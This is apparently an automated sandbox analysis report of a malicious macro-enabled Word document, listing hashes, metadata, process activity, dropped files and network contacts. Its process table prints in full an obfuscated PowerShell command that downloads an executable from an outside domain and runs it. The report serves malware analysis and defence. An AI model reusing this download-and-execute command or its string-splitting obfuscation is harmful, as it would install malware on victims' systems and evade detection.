Property | Value |
---|---|
File name: | get_ticket.doc |
Full analysis: | https://app.any.run/tasks/fdd0c097-b220-47bd-bdcb-feef9bc6a614 |
Verdict: | Malicious activity |
Analysis date: | November 14, 2018, 22:34:35 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | B3D4C845E0A3F99B75CEE70EAC11D30D |
SHA1: | 3616337E617B0322C6002B271C221AB9E6778AAF |
SHA256: | 243538303C9FFE849B598516CA549F97D4929DA0D3F56BBF4E8CD4AD4E170B52 |
SSDEEP: | 1536:C5u80+qY1nlJU3S/oLe36EGj6t7z+gEE6LS9dIOJ/uC:Cw80hYtdoq3Txg+9f/uC |
Extension | File type |
---|---|
.docm | Word Microsoft Office Open XML Format document (with Macro) (53.6) |
.docx | Word Microsoft Office Open XML Format document (24.2) |
.zip | Open Packaging Conventions container (18) |
.zip | ZIP compressed archive (4.1) |
Property | Value |
---|---|
AppVersion: | 16 |
HyperlinksChanged: | No |
SharedDoc: | No |
CharactersWithSpaces: | - |
LinksUpToDate: | No |
Company: | home |
TitlesOfParts: | - |
HeadingPairs: | |
ScaleCrop: | No |
Paragraphs: | - |
Lines: | 1 |
DocSecurity: | None |
Application: | Microsoft Office Word |
Characters: | - |
Words: | - |
Pages: | 1 |
TotalEditTime: | - |
Template: | Normal.dotm |
ModifyDate: | 2018:11:14 14:36:00Z |
CreateDate: | 2018:11:14 14:36:00Z |
RevisionNumber: | 2 |
LastModifiedBy: | admin |
Keywords: | - |
Creator: | - |
Subject: | - |
Title: | - |
Property | Value |
---|---|
ZipFileName: | [Content_Types].xml |
ZipUncompressedSize: | 1503 |
ZipCompressedSize: | 399 |
ZipCRC: | 0x3f450766 |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0006 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2784 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\get_ticket.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
3688 | powershell $path = 'caUnT4:\winaUnT4dows\teaUnT4mp\p.eaUnT4xe' -replace 'aUnT4', '';iex('$wc = new-obaUnT4ject neaUnT4t.webaUnT4client; $wc.dowaUnT4nloaUnT4adfilaUnT4e(\"haUnT4taUnT4taUnT4ps://www.aultlegal.com/HP_fix_it8712.exe\", $path)' -replace 'aUnT4', '');iex('staaUnT4rt-proaUnT4cesaUnT4s $path' -replace 'aUnT4', ''); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | WINWORD.EXE |
3288 | "C:\windows\temp\p.exe" | C:\windows\temp\p.exe | | powershell.exe |

PID | User | Company | Integrity Level | Description | Version | Exit code |
---|---|---|---|---|---|---|
2784 | admin | Microsoft Corporation | MEDIUM | Microsoft Word | 14.0.6024.1000 | |
3688 | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 6.1.7600.16385 (win7_rtm.090713-1255) | 0 |
3288 | admin | Morgan Stanley Protect | MEDIUM | Lifeschool | 15.6.64.34 | |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2784 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9805.tmp.cvr | — | — | — |
3688 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\POGIXZY0EZKOBZNNLZBJ.temp | — | — | — |
2784 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | 3579E0DBDB57BAA016FB59E928A34E05 | E2412788B389440144B7CCBDD0C8BAE85D9DA88D9BB0E6C4BB7D9394D34745A4 |
3688 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\E02357FC7708441D4B0BE5F371F4B28961870F70 | binary | DA6C793FB0533AF0139A6D76C9956547 | BCEC4BFFD8EE03E0FDF1C1577EF4635AC08DB1F94CF07B0C406A6B3A171E9E1D |
3688 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 3C6A7AAE234382390B6B52F47ECA1BAA | C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 |
3688 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5da4b7.TMP | binary | 3C6A7AAE234382390B6B52F47ECA1BAA | C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 |
3688 | powershell.exe | C:\windows\temp\p.exe | executable | EA0C4DCAB1D5BA62B00B58B8DFEECD8A | B38D476008AAFF41EFFBBEDB6022EA59369A55754369B981340CD63DF6B8FCB5 |
2784 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | BEFEA26C8A4DCFEA564F9EFCEC5865C3 | 551EF632D788BA0FCDF95710A48389315FAA34AA7E3EA2025359AA97F0F7FB4D |
2784 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$t_ticket.doc | pgc | A6A4B6625A67829CB98EFF822BED42B4 | 030DF7141B6F51FA1A46715F43AD1E5E69399FCAB657D3055871A84DCF323D72 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3688 | powershell.exe | 67.227.172.56:443 | www.aultlegal.com | Liquid Web, L.L.C | US | unknown |
Domain | IP | Reputation |
---|---|---|
www.aultlegal.com | | unknown |
Process | Message |
---|---|
p.exe | MP3 file corrupted |